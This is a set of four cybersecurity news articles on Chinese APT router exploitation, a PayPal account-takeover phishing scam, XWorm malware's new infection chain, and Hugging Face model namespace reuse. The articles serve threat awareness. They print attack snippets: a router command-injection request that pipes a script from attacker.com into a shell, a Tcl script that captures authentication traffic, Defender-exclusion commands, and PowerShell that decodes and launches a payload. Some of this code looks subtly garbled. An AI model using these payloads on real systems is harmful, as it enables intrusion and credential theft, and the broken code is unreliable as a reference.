Over the past several years, a concerted campaign by Chinese state-sponsored Advanced Persistent Threat (APT) groups has exploited critical vulnerabilities in enterprise-grade routers to establish long-term footholds within global telecommunications and government networks.

These actors, often identified under monikers such as Salt Typhoon and OPERATOR PANDA, have systematically targeted provider edge (PE) and customer edge (CE) devices from leading vendors, leveraging publicly disclosed Common Vulnerabilities and Exposures (CVEs) to gain initial unauthorized access.

Their operations have demonstrated a high degree of stealth, chaining multiple exploits to move laterally and evade conventional detection tools.

The typical multi-stage attack flow begins with a web-component injection and culminating in embedded packet capture.

In initial intrusion attempts, threat actors commonly exploit CVE-2024-21887 in Ivanti Connect Secure and CVE-2024-3400 within Palo Alto Networks PAN-OS GlobalProtect.

These flaws allow remote code execution through crafted HTTP requests, granting attackers a foothold in the router’s privileged management interface.

While researchers noted that once access is achieved, the actors pivot swiftly, exploiting older vulnerabilities such as CVE-2018-0171 in Cisco IOS smart install, and CVE-2023-20198 in IOS XE web management modules, creating a dependable chain of escalation and persistence.

Cyble analysts identified rapid weaponization of publicly available proof-of-concept exploit code, often tailored in Python or Tcl scripts to suit specific router environments.

A representative snippet used in these campaigns is shown here, demonstrating command injection via the web management interface:-

import requests

url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)

Leveraging this technique, attackers achieve remote shell execution, subsequently deploying custom tooling to harvest configuration files, credentials, and session data.

Persistence Tactics

After initial access, Chinese APT groups focus on embedding themselves deeply within the router’s operating environment to ensure longevity.

They alter Access Control Lists (ACLs) to whitelist attacker-controlled IP addresses and open non-standard ports such as 32768 and 8081 for covert access.

In many cases, malefactors exploit Cisco’s Embedded Packet Capture (EPC) functionality to siphon TACACS+ and RADIUS authentication traffic, effectively harvesting clear-text credentials. To automate this, they deploy Tcl-based scripts stored in the router’s flash memory:

package require json
set cap Cmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcap

These scripts run at boot time, triggered via altered startup configurations, creating persistent PCAP files that are periodically exfiltrated over encrypted GRE tunnels.

By manipulating the AAA (Authentication, Authorization, Accounting) configuration, the actors redirect logs and disable alerting features, effectively blinding enterprise defenders.

Through these methods, the compromised devices become reliable launchpads for broader enterprise infiltration, allowing the APT actors to maintain a stealthy presence for months or even years.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Chinese APT Hackers Exploit Router Vulnerabilities to Infiltrate Enterprise Environments appeared first on Cyber Security News.

A sophisticated phishing campaign targeting PayPal’s massive user base has emerged, utilizing deceptive “Set up your account profile” emails to compromise user accounts through an ingenious secondary user addition scheme.

The attack leverages advanced email spoofing techniques and psychological manipulation tactics to bypass traditional security awareness measures, representing a significant evolution in financial fraud methodologies.

The scam operates through carefully crafted emails that appear to originate from legitimate PayPal addresses such as service@paypal.com and service@paypal.co.uk.

However, threat actors employ address spoofing techniques that exploit inherent weaknesses in email authentication protocols.

The attackers configure their email clients to display fraudulent sender addresses, taking advantage of the fact that most email systems lack stringent verification mechanisms for “From” field authenticity.

Recipients receive messages claiming detection of a new payment profile with charges of $910.45 USD at Kraken.com, a legitimate cryptocurrency trading platform.

The emails feature authentic PayPal branding and layout elements, likely extracted from genuine PayPal communications.

Malwarebytes analysts noted several critical red flags within these messages, including unusual recipient addresses utilizing compromised domains with “.test-google-a.com” extensions, subject lines misaligned with email content, and absence of personalized greetings that legitimate PayPal communications always include.

Sophisticated Account Takeover Mechanism

The campaign’s most insidious element involves redirecting victims to authentic PayPal infrastructure rather than traditional phishing sites.

When users click the embedded links, they unwittingly initiate PayPal’s legitimate secondary user addition process instead of the expected profile setup or payment dispute resolution.

This technique represents a paradigm shift from conventional phishing approaches, as it exploits PayPal’s own functionality to achieve malicious objectives.

The secondary user addition process grants extensive account privileges, including payment authorization capabilities.

Once successfully added as a secondary user, threat actors gain sufficient access to drain victims’ PayPal balances and conduct unauthorized transactions.

This approach bypasses many traditional anti-phishing measures since the destination URLs resolve to legitimate PayPal domains, making detection significantly more challenging for both automated security systems and end users.

The campaign has reportedly operated for over a month, targeting PayPal’s 434 million active users through databases of email addresses associated with PayPal accounts or previous PayPal interactions.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Threat Actors Attack PayPal Users in New Account Profile Set up Scam appeared first on Cyber Security News.

Emerging quietly in mid-2025, the XWorm backdoor has evolved into a deceptively sophisticated threat that preys on both user confidence and system conventions.

Initial reports surfaced when organizations noted a sudden uptick in obscure .lnk-based phishing emails masquerading as benign documents.

Security teams quickly observed that these shortcuts triggered hidden PowerShell routines rather than opening any expected files, suggesting the emergence of a new infection chain.

Within days, enterprises across multiple sectors reported anomalous network connections to unfamiliar IP addresses, hinting at an active Command and Control (C2) infrastructure.

As the campaign gained momentum, Trellix analysts identified a notable departure from XWorm’s earlier, more predictable methods.

Gone were the simplistic batch scripts and obvious VBScript payloads; instead, the attackers now deploy a multi-stage mechanism that leverages both social engineering and technical subterfuge.

The initial .lnk file, often delivered via targeted spear-phishing, drops a benign-looking text artifact before silently fetching “discord.exe” from a remote host.

Upon execution, this .NET-based executable unpacks and launches two additional components—main.exe and system32.exe—with the latter serving as the core XWorm payload.

Once system32.exe takes hold, it performs rigorous environment checks, aborting if it detects a sandbox or virtual machine.

If the host is deemed genuine, the malware duplicates itself as Xclient.exe and establishes persistence by creating both a scheduled task and a registry Run key.

System defenses are methodically dismantled: Windows Firewall policies are disabled via modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall, while PowerShell execution policies are bypassed to white-list the malicious processes.

ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\Temp\discord.exe"
ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"

These commands ensure XWorm operates under minimal scrutiny, allowing unfettered access to the compromised environment.

Infection Mechanism and Deployment

The heart of XWorm’s new chain lies in its ingenious use of base64 encoding combined with Rijndael decryption, allowing the payload to remain concealed until execution.

The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command.

This command retrieves “discord.exe” from hxxp://85[.]203[.]4[.]232:5000/Discord.exe, saving it to the Temp directory before launching it stealthily.

$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMP\discord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMP\discord.exe" -WindowStyle Hidden

After activation, discord.exe drops main.exe and system32.exe, each packed with advanced obfuscation techniques to thwart static analysis.

Main.exe’s resource section harbors embedded Python modules, while system32.exe implements early TLS callbacks to execute critical code before any security hooks can intervene.

This layered approach not only complicates detection but ensures that each component reinforces the next, yielding a resilient, stealth-focused infection chain that challenges conventional defense strategies.

Through this evolution, XWorm demonstrates how blending social engineering, multi-stage payload delivery, and sophisticated cryptographic concealment can enable adversaries to outpace existing detection technologies, maintaining both stealth and persistence within targeted networks.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post XWorm Malware With New Infection Chain Evade Detection Exploiting User and System Trust appeared first on Cyber Security News.

Cybersecurity researchers have uncovered a critical vulnerability in the artificial intelligence supply chain that enables attackers to achieve remote code execution across major cloud platforms including Microsoft Azure AI Foundry, Google Vertex AI, and thousands of open-source projects.

The newly discovered attack method, termed “Model Namespace Reuse,” exploits a fundamental flaw in how AI platforms manage and trust model identifiers within the Hugging Face ecosystem.

The vulnerability stems from Hugging Face’s namespace management system, where models are identified using a two-part naming convention: Author/ModelName.

When organizations or authors delete their accounts from Hugging Face, their unique namespaces return to an available pool rather than becoming permanently reserved.

This creates an opportunity for malicious actors to register previously used namespaces and upload compromised models under trusted names, potentially affecting any system that references models by name alone.

Palo Alto Networks analysts identified this supply chain attack vector during an extensive investigation of AI platform security practices.

The research revealed that the vulnerability affects not only direct integrations with Hugging Face but also extends to major cloud AI services that incorporate Hugging Face models into their catalogs.

The attack’s scope is particularly concerning given the widespread adoption of AI models across enterprise environments and the implicit trust placed in model naming conventions.

The attack mechanism operates through two primary scenarios. In the first, when a model author’s account is deleted, the namespace becomes immediately available for re-registration.

The second scenario involves ownership transfers where models are moved to new organizations, followed by deletion of the original author account.

In both cases, malicious actors can exploit the namespace reuse to substitute legitimate models with compromised versions containing malicious payloads.

Technical Implementation and Attack Vectors

The researchers demonstrated the vulnerability’s practical impact through controlled proof-of-concept attacks against Google Vertex AI and Microsoft Azure AI Foundry.

In their testing, they successfully registered abandoned namespaces and uploaded models embedded with reverse shell payloads.

The malicious code executed automatically when cloud platforms deployed these seemingly legitimate models, granting attackers access to underlying infrastructure.

from transformers import AutoTokenizer, AutoModelForCausalLM

# Vulnerable code pattern found in thousands of repositories
tokenizer = AutoTokenizer.from_pretrained("AIOrg/Translator_v1")
model = AutoModelForCausalLM.from_pretrained("AIOrg/Translator_v1")

The attack’s effectiveness lies in its exploitation of automated deployment processes. When platforms like Vertex AI’s Model Garden or Azure AI Foundry’s Model Catalog reference models by name, they inadvertently create persistent attack surfaces.

The researchers documented gaining access to dedicated containers with elevated permissions within Google Cloud Platform and Azure environments, demonstrating the severity of potential breaches.

Organizations can mitigate this risk through version pinning, implementing the revision parameter to lock models to specific commits, and establishing controlled storage environments for critical AI assets.

The discovery underscores the urgent need for comprehensive security frameworks addressing AI supply chain vulnerabilities as organizations increasingly integrate machine learning capabilities into production systems.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New Namespace Reuse Vulnerability Allows Remote Code Execution in Microsoft Azure AI, Google Vertex AI, and Hugging Face appeared first on Cyber Security News.